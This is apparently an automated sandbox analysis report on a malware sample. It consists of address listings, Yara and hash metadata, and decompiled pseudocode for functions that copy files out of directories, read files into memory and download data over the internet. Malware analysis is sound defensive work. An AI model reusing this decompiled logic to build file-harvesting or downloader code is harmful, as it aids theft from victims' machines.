                                                                                                                              0x0041890b
                                                                                                                              0x0041890d
                                                                                                                              0x00418919
                                                                                                                              0x00418929
                                                                                                                              0x0041892c
                                                                                                                              0x0041892e
                                                                                                                              0x00418932
                                                                                                                              0x00418934
                                                                                                                              0x00418934
                                                                                                                              0x00418932
                                                                                                                              0x00418941
                                                                                                                              0x0041894d
                                                                                                                              0x00418959
                                                                                                                              0x0041895f
                                                                                                                              0x00418967
                                                                                                                              0x00418979
                                                                                                                              0x00418981
                                                                                                                              0x00418984
                                                                                                                              0x00418993
                                                                                                                              0x00418999
                                                                                                                              0x00418999
                                                                                                                              0x004189a9
                                                                                                                              0x004189ab
                                                                                                                              0x004189b7
                                                                                                                              0x004189bd
                                                                                                                              0x004189c3
                                                                                                                              0x004189cc
                                                                                                                              0x004189ce
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004189d9
                                                                                                                              0x004189dc
                                                                                                                              0x004189e4
                                                                                                                              0x004189e4
                                                                                                                              0x004189ed
                                                                                                                              0x004189f0
                                                                                                                              0x004189f0
                                                                                                                              0x004189fa
                                                                                                                              0x00418a01
                                                                                                                              0x00418a08
                                                                                                                              0x00418a0a
                                                                                                                              0x00418a76
                                                                                                                              0x00418a76
                                                                                                                              0x00418a80
                                                                                                                              0x00418a86
                                                                                                                              0x00418a89
                                                                                                                              0x00418a94
                                                                                                                              0x00418a96
                                                                                                                              0x00418aae
                                                                                                                              0x00418aae
                                                                                                                              0x00418ab5
                                                                                                                              0x00418ab5
                                                                                                                              0x00418ab9
                                                                                                                              0x00418acf
                                                                                                                              0x00418ad3
                                                                                                                              0x00418aed
                                                                                                                              0x00418af1
                                                                                                                              0x00418b0b
                                                                                                                              0x00418b0f
                                                                                                                              0x00418b21
                                                                                                                              0x004194f7
                                                                                                                              0x00419504
                                                                                                                              0x00419504
                                                                                                                              0x00418b1c
                                                                                                                              0x00418b2b
                                                                                                                              0x00418b2b
                                                                                                                              0x00418b2f
                                                                                                                              0x00418b39
                                                                                                                              0x00418b43
                                                                                                                              0x00418b48
                                                                                                                              0x00418b54
                                                                                                                              0x00418b60
                                                                                                                              0x00418b6c
                                                                                                                              0x00418b72
                                                                                                                              0x00418b7a
                                                                                                                              0x00418b8c
                                                                                                                              0x00418b97
                                                                                                                              0x00418ba6
                                                                                                                              0x00418bac
                                                                                                                              0x00418bac
                                                                                                                              0x00418bbb
                                                                                                                              0x00418bc7
                                                                                                                              0x00418bc7
                                                                                                                              0x00418bca
                                                                                                                              0x00418bd0
                                                                                                                              0x00418bd8
                                                                                                                              0x00418bde
                                                                                                                              0x00418be5
                                                                                                                              0x00418be5
                                                                                                                              0x00418bfa
                                                                                                                              0x00418c06
                                                                                                                              0x00418c10
                                                                                                                              0x00418c12
                                                                                                                              0x00418c61
                                                                                                                              0x00418c61
                                                                                                                              0x00418c67
                                                                                                                              0x00418c6d
                                                                                                                              0x00418c77
                                                                                                                              0x00418c81
                                                                                                                              0x00418c8b
                                                                                                                              0x00418c95
                                                                                                                              0x00418c9f
                                                                                                                              0x00418ca9
                                                                                                                              0x00418cb3
                                                                                                                              0x00418cbf
                                                                                                                              0x00418ccb
                                                                                                                              0x00418cd7
                                                                                                                              0x00418ce7
                                                                                                                              0x00418ced
                                                                                                                              0x00418cfc
                                                                                                                              0x00418d09
                                                                                                                              0x00418d0c
                                                                                                                              0x00418d12
                                                                                                                              0x00418d14
                                                                                                                              0x00418d1b
                                                                                                                              0x00418d1b
                                                                                                                              0x00418d14
                                                                                                                              0x00418d29
                                                                                                                              0x00418d34
                                                                                                                              0x00418d3b
                                                                                                                              0x00418d3f
                                                                                                                              0x00418d64
                                                                                                                              0x00418d64
                                                                                                                              0x00000000
                                                                                                                              0x00418d41
                                                                                                                              0x00418d41
                                                                                                                              0x00418d47
                                                                                                                              0x00418d4b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00418d5c
                                                                                                                              0x00418d6e
                                                                                                                              0x00418d74
                                                                                                                              0x00418d83
                                                                                                                              0x00418d8b
                                                                                                                              0x00418d9b
                                                                                                                              0x00418db3
                                                                                                                              0x00418dbf
                                                                                                                              0x00418dc5
                                                                                                                              0x00418dd2
                                                                                                                              0x00418dd8
                                                                                                                              0x00418de2
                                                                                                                              0x00418de9
                                                                                                                              0x00418df0
                                                                                                                              0x00418df7
                                                                                                                              0x00418dfe
                                                                                                                              0x00418e0e
                                                                                                                              0x00418e27
                                                                                                                              0x00418e40
                                                                                                                              0x00418e59
                                                                                                                              0x00418e68
                                                                                                                              0x00418e81
                                                                                                                              0x00418e9a
                                                                                                                              0x00418eb3
                                                                                                                              0x00418ec2
                                                                                                                              0x00418edb
                                                                                                                              0x00418ef4
                                                                                                                              0x00418f0d
                                                                                                                              0x00418f13
                                                                                                                              0x00418f19
                                                                                                                              0x00418f21
                                                                                                                              0x00418f26
                                                                                                                              0x00418f2c
                                                                                                                              0x00418f35
                                                                                                                              0x00418f39
                                                                                                                              0x00418f4c
                                                                                                                              0x00418f51
                                                                                                                              0x00418f54
                                                                                                                              0x00418f5a
                                                                                                                              0x00418f61
                                                                                                                              0x00418f91
                                                                                                                              0x00418f97
                                                                                                                              0x00418f9a
                                                                                                                              0x00418fa0
                                                                                                                              0x00418fa4
                                                                                                                              0x00418fc5
                                                                                                                              0x00418fd2
                                                                                                                              0x00418fdf
                                                                                                                              0x00418fee
                                                                                                                              0x00419005
                                                                                                                              0x00419005
                                                                                                                              0x0041900c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419017
                                                                                                                              0x00419019
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041902f
                                                                                                                              0x00419034
                                                                                                                              0x00418ffc
                                                                                                                              0x00418ffc
                                                                                                                              0x00418fff
                                                                                                                              0x00418fff
                                                                                                                              0x00419040
                                                                                                                              0x00419042
                                                                                                                              0x00419044
                                                                                                                              0x0041904c
                                                                                                                              0x00419052
                                                                                                                              0x00419052
                                                                                                                              0x00419055
                                                                                                                              0x0041905a
                                                                                                                              0x0041905a
                                                                                                                              0x0041905d
                                                                                                                              0x00419078
                                                                                                                              0x00419078
                                                                                                                              0x0041907f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419094
                                                                                                                              0x0041906f
                                                                                                                              0x0041906f
                                                                                                                              0x00419072
                                                                                                                              0x00419072
                                                                                                                              0x004190a9
                                                                                                                              0x004190ac
                                                                                                                              0x004190c7
                                                                                                                              0x004190c7
                                                                                                                              0x004190ce
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004190e6
                                                                                                                              0x004190eb
                                                                                                                              0x004190f4
                                                                                                                              0x004190be
                                                                                                                              0x004190be
                                                                                                                              0x004190c1
                                                                                                                              0x004190c1
                                                                                                                              0x00419100
                                                                                                                              0x00419103
                                                                                                                              0x00419109
                                                                                                                              0x0041910b
                                                                                                                              0x0041911a
                                                                                                                              0x0041911f
                                                                                                                              0x0041912b
                                                                                                                              0x0041912b
                                                                                                                              0x00419134
                                                                                                                              0x00419134
                                                                                                                              0x0041910b
                                                                                                                              0x00419137
                                                                                                                              0x00419144
                                                                                                                              0x00419147
                                                                                                                              0x0041915d
                                                                                                                              0x0041915d
                                                                                                                              0x00000000
                                                                                                                              0x00419149
                                                                                                                              0x0041914d
                                                                                                                              0x0041914f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419151
                                                                                                                              0x00419167
                                                                                                                              0x00419173
                                                                                                                              0x0041917a
                                                                                                                              0x0041917c
                                                                                                                              0x0041919b
                                                                                                                              0x0041919f
                                                                                                                              0x004191a1
                                                                                                                              0x004191b9
                                                                                                                              0x004191bd
                                                                                                                              0x004191bf
                                                                                                                              0x004191c7
                                                                                                                              0x004191c7
                                                                                                                              0x004191d1
                                                                                                                              0x004191d7
                                                                                                                              0x004191e1
                                                                                                                              0x00419201
                                                                                                                              0x00419204
                                                                                                                              0x0041920a
                                                                                                                              0x0041920e
                                                                                                                              0x0041921e
                                                                                                                              0x00419222
                                                                                                                              0x00419242
                                                                                                                              0x0041924b
                                                                                                                              0x0041925a
                                                                                                                              0x00419272
                                                                                                                              0x00419281
                                                                                                                              0x00419287
                                                                                                                              0x00419291
                                                                                                                              0x00419293
                                                                                                                              0x00419371
                                                                                                                              0x00419371
                                                                                                                              0x0041937c
                                                                                                                              0x0041937e
                                                                                                                              0x0041938a
                                                                                                                              0x0041938e
                                                                                                                              0x004193a5
                                                                                                                              0x004193a5
                                                                                                                              0x004193c0
                                                                                                                              0x004193c6
                                                                                                                              0x004193cd
                                                                                                                              0x004193e2
                                                                                                                              0x004193e2
                                                                                                                              0x004193eb
                                                                                                                              0x004193f5
                                                                                                                              0x004193fc
                                                                                                                              0x004193fc
                                                                                                                              0x00419402
                                                                                                                              0x00419406
                                                                                                                              0x00419425
                                                                                                                              0x00419431
                                                                                                                              0x0041944c
                                                                                                                              0x0041945a
                                                                                                                              0x0041946d
                                                                                                                              0x00419479
                                                                                                                              0x00419484
                                                                                                                              0x00419490
                                                                                                                              0x00419490
                                                                                                                              0x00419492
                                                                                                                              0x00419498
                                                                                                                              0x0041949c
                                                                                                                              0x004194b8
                                                                                                                              0x004194be
                                                                                                                              0x004194be
                                                                                                                              0x004194c4
                                                                                                                              0x004194cb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004194d9
                                                                                                                              0x004194d9
                                                                                                                              0x004194e7
                                                                                                                              0x004194ed
                                                                                                                              0x004194f3
                                                                                                                              0x004194f3
                                                                                                                              0x004194f3
                                                                                                                              0x00000000
                                                                                                                              0x004194f3
                                                                                                                              0x004194aa
                                                                                                                              0x00000000
                                                                                                                              0x004194aa
                                                                                                                              0x0041940e
                                                                                                                              0x00000000
                                                                                                                              0x0041940e
                                                                                                                              0x004193cf
                                                                                                                              0x00000000
                                                                                                                              0x004193cf
                                                                                                                              0x00419397
                                                                                                                              0x00419399
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041939b
                                                                                                                              0x00000000
                                                                                                                              0x0041939b
                                                                                                                              0x00419380
                                                                                                                              0x00000000
                                                                                                                              0x00419380
                                                                                                                              0x0041929f
                                                                                                                              0x004192a2
                                                                                                                              0x004192b0
                                                                                                                              0x004192b4
                                                                                                                              0x004192c2
                                                                                                                              0x004192c5
                                                                                                                              0x004192ce
                                                                                                                              0x004192ce
                                                                                                                              0x004192d1
                                                                                                                              0x004192d1
                                                                                                                              0x004192df
                                                                                                                              0x004192fc
                                                                                                                              0x00419301
                                                                                                                              0x00419304
                                                                                                                              0x00419306
                                                                                                                              0x00419325
                                                                                                                              0x0041932d
                                                                                                                              0x00419333
                                                                                                                              0x0041933a
                                                                                                                              0x00419346
                                                                                                                              0x00419356
                                                                                                                              0x0041935e
                                                                                                                              0x00419360
                                                                                                                              0x00000000
                                                                                                                              0x0041936c
                                                                                                                              0x00419362
                                                                                                                              0x00000000
                                                                                                                              0x00419362
                                                                                                                              0x0041933c
                                                                                                                              0x00419308
                                                                                                                              0x00419308
                                                                                                                              0x00419308
                                                                                                                              0x00000000
                                                                                                                              0x00419306
                                                                                                                              0x004192a8
                                                                                                                              0x004192aa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004192aa
                                                                                                                              0x00419224
                                                                                                                              0x00000000
                                                                                                                              0x00419224
                                                                                                                              0x00419216
                                                                                                                              0x00000000
                                                                                                                              0x00419216
                                                                                                                              0x004191a3
                                                                                                                              0x004191a7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004191b4
                                                                                                                              0x00000000
                                                                                                                              0x004191b4
                                                                                                                              0x0041917e
                                                                                                                              0x00419182
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00419191
                                                                                                                              0x00419196
                                                                                                                              0x00000000
                                                                                                                              0x00419196
                                                                                                                              0x00419147
                                                                                                                              0x00418fac
                                                                                                                              0x00418fb7
                                                                                                                              0x00000000
                                                                                                                              0x00418fb7
                                                                                                                              0x00418f69
                                                                                                                              0x00418f6e
                                                                                                                              0x00000000
                                                                                                                              0x00418f6e
                                                                                                                              0x00418d3f
                                                                                                                              0x00418c1a
                                                                                                                              0x00418c1a
                                                                                                                              0x00418c1d
                                                                                                                              0x00418c23
                                                                                                                              0x00418c2c
                                                                                                                              0x00418c32
                                                                                                                              0x00418c39
                                                                                                                              0x00418c39
                                                                                                                              0x00418c42
                                                                                                                              0x00418c48
                                                                                                                              0x00418c4f
                                                                                                                              0x00418c58
                                                                                                                              0x00418c58
                                                                                                                              0x00418c5b
                                                                                                                              0x00000000
                                                                                                                              0x00418c5b
                                                                                                                              0x00418b31
                                                                                                                              0x00000000
                                                                                                                              0x00418b31
                                                                                                                              0x00418af7
                                                                                                                              0x00418b06
                                                                                                                              0x00000000
                                                                                                                              0x00418b06
                                                                                                                              0x00418ad5
                                                                                                                              0x00418ae8
                                                                                                                              0x00000000
                                                                                                                              0x00418ae8
                                                                                                                              0x00418ac5
                                                                                                                              0x00418aca
                                                                                                                              0x00000000
                                                                                                                              0x00418aca
                                                                                                                              0x00418a98
                                                                                                                              0x00418a9f
                                                                                                                              0x00418aa4
                                                                                                                              0x00418aaa
                                                                                                                              0x00418aac
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00418aac
                                                                                                                              0x00418a12
                                                                                                                              0x00418a1e
                                                                                                                              0x00418a1e
                                                                                                                              0x00418a21
                                                                                                                              0x00418a27
                                                                                                                              0x00418a2f
                                                                                                                              0x00418a35
                                                                                                                              0x00418a3c
                                                                                                                              0x00418a3c
                                                                                                                              0x00418a51
                                                                                                                              0x00418a57
                                                                                                                              0x00418a5d
                                                                                                                              0x00418a65
                                                                                                                              0x00418a68
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00418a6a
                                                                                                                              0x00000000
                                                                                                                              0x00418a6a
                                                                                                                              0x004189ad
                                                                                                                              0x00000000
                                                                                                                              0x004189ad
                                                                                                                              0x0041890f
                                                                                                                              0x00000000
                                                                                                                              0x0041890f
                                                                                                                              0x004188f7
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: T$U
                                                                                                                              • API String ID: 0-2115836835
                                                                                                                              • Opcode ID: 18092dbc252dd27ffa9615e769ff1d9d1212ef7a4eefe440ba380eb063a4a779
                                                                                                                              • Instruction ID: 4f5f955fb991d278dce92fc5985d41fb36bba980f5426177948d2db208f0af64
                                                                                                                              • Opcode Fuzzy Hash: 18092dbc252dd27ffa9615e769ff1d9d1212ef7a4eefe440ba380eb063a4a779
                                                                                                                              • Instruction Fuzzy Hash: 8D7228B49052A98BDB24CF14C994BEEBBB2BF85304F1440DAD6096B342D7389EC5CF59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424D00, Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 42%
                                                                                                                              			E00424D00(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, CHAR* _a8, intOrPtr _a12, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				signed int _t21;
				intOrPtr _t25;
				void* _t41;
				signed int _t58;
				void* _t59;
				void* _t60;

				_t57 = __esi;
				_t56 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t21 =  *0x4301f4; // 0xe687535
				_v12 = _t21 ^ _t58;
				SetCurrentDirectoryA(_a8); // executed
				_t25 = E004043DF(__ebx, _t51, __edi, __esi, _a12, 0x431e70); // executed
				_t60 = _t59 + 8;
				_v8 = _t25;
				if(_v8 != 0xffffffff) {
					do {
						E004091C0( &_v540, 0, 0x104);
						E004091C0( &_v276, 0, 0x104);
						 *0x4328c4( &_v540, _a8);
						 *0x4328c4( &_v540, 0x431e94);
						 *0x4328c4( &_v276, 0x431f98);
						 *0x4328c4( &_v276,  *0x4320c4);
						 *0x4328c4( &_v276, _a20);
						 *0x4328c4( &_v276, 0x431e94);
						_t51 =  &_v540;
						CopyFileA( &_v540,  &_v276, 1); // executed
						_t41 = E00404506(__ebx,  &_v540, __edi, __esi, _v8, 0x431e70); // executed
						_t60 = _t60 + 0x20;
					} while (_t41 == 0);
					_t25 = E00404634(_v8);
				}
				return E00404354(_t25, _t42, _v12 ^ _t58, _t51, _t56, _t57);
			}













                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d00
                                                                                                                              0x00424d09
                                                                                                                              0x00424d10
                                                                                                                              0x00424d17
                                                                                                                              0x00424d26
                                                                                                                              0x00424d2b
                                                                                                                              0x00424d2e
                                                                                                                              0x00424d35
                                                                                                                              0x00424d3b
                                                                                                                              0x00424d49
                                                                                                                              0x00424d5f
                                                                                                                              0x00424d72
                                                                                                                              0x00424d84
                                                                                                                              0x00424d96
                                                                                                                              0x00424daa
                                                                                                                              0x00424dbb
                                                                                                                              0x00424dcd
                                                                                                                              0x00424ddc
                                                                                                                              0x00424de3
                                                                                                                              0x00424df2
                                                                                                                              0x00424df7
                                                                                                                              0x00424dfa
                                                                                                                              0x00424e06
                                                                                                                              0x00424e0b
                                                                                                                              0x00424e1b

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CopyCurrentDirectoryFile__findfirst64i32__findnext64i32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3699756680-0
                                                                                                                              • Opcode ID: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
                                                                                                                              • Instruction ID: 0a98c26ee22be9fba806c266b3a98fbd47b499360a5eee5ad6601350f0339ea8
                                                                                                                              • Opcode Fuzzy Hash: e7f05cfdac8478aabc2ed35e95e0e28842fb9a9b9d53bf89e4aab547a3be5951
                                                                                                                              • Instruction Fuzzy Hash: A6218CB290021CABCB18EBA0DD8AEDD7378AB5C301F0456A9F716571D0DBB49A88CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CC40, Relevance: 9.1, APIs: 6, Instructions: 77filememoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0041CC40(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;
				void* _t30;
				void* _t36;
				int _t39;

				_v8 = 0;
				_v16 = 0;
				_t30 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t30;
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0x43276c() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						_t36 = LocalAlloc(0x40,  *_a12); // executed
						 *_a8 = _t36;
						if( *_a8 != 0) {
							_t39 = ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0); // executed
							if(_t39 == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					FindCloseChangeNotification(_v16); // executed
					goto L12;
				}
			}












                                                                                                                              0x0041cc46
                                                                                                                              0x0041cc4d
                                                                                                                              0x0041cc67
                                                                                                                              0x0041cc6d
                                                                                                                              0x0041cc74
                                                                                                                              0x0041cd1b
                                                                                                                              0x0041cd21
                                                                                                                              0x0041cc84
                                                                                                                              0x0041cc87
                                                                                                                              0x0041cc8b
                                                                                                                              0x0041cc94
                                                                                                                              0x0041cca2
                                                                                                                              0x0041ccac
                                                                                                                              0x0041ccb5
                                                                                                                              0x0041ccbd
                                                                                                                              0x0041ccd5
                                                                                                                              0x0041ccdd
                                                                                                                              0x0041ccf2
                                                                                                                              0x0041cce9
                                                                                                                              0x0041cce9
                                                                                                                              0x0041cce9
                                                                                                                              0x0041ccfc
                                                                                                                              0x0041cd03
                                                                                                                              0x0041cd0b
                                                                                                                              0x0041cd0b
                                                                                                                              0x0041cd03
                                                                                                                              0x0041ccbd
                                                                                                                              0x0041cd15
                                                                                                                              0x00000000
                                                                                                                              0x0041cd15

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041CC67
                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0041CC8C
                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0041CCAC
                                                                                                                              • ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000), ref: 0041CCD5
                                                                                                                              • LocalFree.KERNEL32 ref: 0041CD0B
                                                                                                                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0041CD15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1815715184-0
                                                                                                                              • Opcode ID: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
                                                                                                                              • Instruction ID: ec94014e0aba5c49b0ec51f71834824b71e99b3ffa1dd42a2f7eb069ed426627
                                                                                                                              • Opcode Fuzzy Hash: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
                                                                                                                              • Instruction Fuzzy Hash: B931DBB4A40209EFDB14DF94DD84BEEB7B5FB48300F208169E915AB390D778AA81CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421CF0, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 313filenetworkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E00421CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				long _v80;
				intOrPtr _v84;
				int _v88;
				char _v351;
				char _v352;
				intOrPtr _v356;
				void* _v360;
				intOrPtr _v364;
				void* _v368;
				intOrPtr _v372;
				signed int _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				int _t191;
				intOrPtr _t193;
				intOrPtr _t205;
				intOrPtr _t215;
				intOrPtr _t243;
				intOrPtr _t251;
				void* _t253;
				intOrPtr _t260;
				intOrPtr _t289;
				signed int _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t350 = __esi;
				_t349 = __edi;
				_t253 = __ebx;
				_push(0xffffffff);
				_push(E004265F4);
				_push( *[fs:0x0]);
				_t353 = _t352 - 0x19c;
				_t183 =  *0x4301f4; // 0xe687535
				_t184 = _t183 ^ _t351;
				_v20 = _t184;
				_push(_t184);
				 *[fs:0x0] =  &_v16;
				_v420 = __ecx;
				_t186 = _v420;
				_t362 =  *((intOrPtr*)(_t186 + 0x28));
				if( *((intOrPtr*)(_t186 + 0x28)) == 0) {
					 *((intOrPtr*)(_v420 + 0x30)) = 0x7800;
					_push( *((intOrPtr*)(_v420 + 0x30))); // executed
					_t251 = E00404349(__edi, __esi, _t362); // executed
					_t353 = _t353 + 4;
					_v392 = _t251;
					 *((intOrPtr*)(_v420 + 0x28)) = _v392;
					 *((intOrPtr*)(_v420 + 0x34)) = 0;
				}
				_v84 =  *((intOrPtr*)(_v420 + 0x34));
				_v80 = 0;
				_v88 = 0;
				 *0x432828(_a4, 0, 0, 0, 0);
				do {
					_t191 = InternetReadFile(_a4,  *((intOrPtr*)(_v420 + 0x28)) +  *((intOrPtr*)(_v420 + 0x34)), 0x3e8,  &_v80); // executed
					_v88 = _t191;
					 *((intOrPtr*)(_v420 + 0x34)) =  *((intOrPtr*)(_v420 + 0x34)) + _v80;
					_t193 = _v420;
					_t260 = _v420;
					_t363 =  *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) - 0x3e8;
					if( *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) <= 0x3e8) {
						 *((intOrPtr*)(_v420 + 0x30)) =  *((intOrPtr*)(_v420 + 0x30)) + 0x7800;
						_push( *((intOrPtr*)(_v420 + 0x30))); // executed
						_t243 = E00404349(_t349, _t350, _t363); // executed
						_v396 = _t243;
						_v356 = _v396;
						E00409240(_v356,  *((intOrPtr*)(_v420 + 0x28)),  *((intOrPtr*)(_v420 + 0x34)) + 1);
						_v400 =  *((intOrPtr*)(_v420 + 0x28));
						_push(_v400); // executed
						E00405122(); // executed
						_t353 = _t353 + 0x14;
						 *((intOrPtr*)(_v420 + 0x28)) = _v356;
					}
				} while (_v88 != 0 && _v80 > 0);
				_v80 = 0x103;
				_v352 = 0;
				E004091C0( &_v351, 0, 0x103);
				_t354 = _t353 + 0xc;
				_push(0);
				_push( &_v80);
				_push( &_v352);
				_push(0x1d);
				_push(_a4);
				if( *0x4327e4() != 0) {
					_v368 = 0;
					_v360 = 0;
					_v364 = 0;
					_v364 =  *0x4327a8(0x4271e0, 0, 1, 0x4271d0,  &_v368);
					if(_v364 >= 0) {
						_t369 = _v368;
						if(_v368 != 0) {
							E004011C0( &_v48,  &_v352);
							_v8 = 0;
							_t205 = E00421BE0(_t253, _t349, _t350, _t369,  &_v76,  &_v48);
							_t355 = _t354 + 8;
							_v424 = _t205;
							_v428 = _v424;
							_v8 = 1;
							_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v368 + 0x10))))(_v368, E004020E0(_v428), L"text",  &_v360);
							_v8 = 0;
							E004020C0( &_v76);
							_v8 = 0xffffffff;
							E004012D0( &_v48);
							if(_v364 >= 0) {
								_t371 = _v360;
								if(_v360 != 0) {
									_v376 = ( *((intOrPtr*)(_v420 + 0x34)) - _v84) * 7;
									_t215 = E00404349(_t349, _t350, _t371);
									_t356 = _t355 + 4;
									_v404 = _t215;
									_v372 = _v404;
									_v384 = 0;
									_v380 = 0;
									_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v360 + 0x10))))(_v360, 0,  *((intOrPtr*)(_v420 + 0x34)) - _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84, _v376, _v372,  *((intOrPtr*)(_v420 + 0x34)) - _v84,  &_v380,  &_v384, 0, _v376);
									if(_v364 >= 0) {
										_t289 = _v420;
										_t373 =  *((intOrPtr*)(_t289 + 0x30)) - _v84 + _v384;
										if( *((intOrPtr*)(_t289 + 0x30)) <= _v84 + _v384) {
											 *((intOrPtr*)(_v420 + 0x30)) = _v84 + _v384 + 0x3e8;
											_push( *((intOrPtr*)(_v420 + 0x30)));
											_v408 = E00404349(_t349, _t350, _t373);
											_v388 = _v408;
											E0040518C( *((intOrPtr*)(_v420 + 0x30)), _v388,  *((intOrPtr*)(_v420 + 0x30)),  *((intOrPtr*)(_v420 + 0x28)), _v84);
											_v412 =  *((intOrPtr*)(_v420 + 0x28));
											_push(_v412);
											E00405122();
											_t356 = _t356 + 0x18;
											 *((intOrPtr*)(_v420 + 0x28)) = _v388;
										}
										E0040518C( *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x30)) - _v84, _v372, _v384);
										_t356 = _t356 + 0x10;
										 *((intOrPtr*)(_v420 + 0x34)) = _v84 + _v384;
									}
									_v416 = _v372;
									E00405122();
									 *((intOrPtr*)( *((intOrPtr*)( *_v360 + 8))))(_v360, _v416);
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_v368 + 8))))(_v368);
						}
					}
				}
				 *( *((intOrPtr*)(_v420 + 0x28)) +  *((intOrPtr*)(_v420 + 0x34))) = 0;
				 *[fs:0x0] = _v16;
				return E00404354( *((intOrPtr*)(_v420 + 0x34)) - _v84, _t253, _v20 ^ _t351,  *((intOrPtr*)(_v420 + 0x34)), _t349, _t350);
			}


















































                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf3
                                                                                                                              0x00421cf5
                                                                                                                              0x00421d00
                                                                                                                              0x00421d01
                                                                                                                              0x00421d07
                                                                                                                              0x00421d0c
                                                                                                                              0x00421d0e
                                                                                                                              0x00421d11
                                                                                                                              0x00421d15
                                                                                                                              0x00421d1b
                                                                                                                              0x00421d21
                                                                                                                              0x00421d27
